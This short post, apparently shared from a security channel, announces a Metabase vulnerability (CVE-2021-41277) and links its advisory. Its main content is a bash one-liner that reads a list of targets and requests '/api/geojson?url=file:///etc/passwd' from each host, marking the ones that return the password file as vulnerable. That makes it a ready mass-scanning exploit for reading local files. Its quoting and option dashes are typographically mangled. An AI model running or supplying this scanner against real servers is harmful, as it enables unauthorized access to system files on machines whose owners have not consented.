November 24, 2021 at 11:33PM

■■■■■ Zero-Day | CVE-2021-41277

cat targets.txt | while read host do;do curl –silent –insecure –path-as-is “$host/api/geojson?url=file:///etc/passwd” | grep -qs “root:x” && echo “$host \033[0;31m Vulnerable”;done

https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr

https://t.me/cKure/10227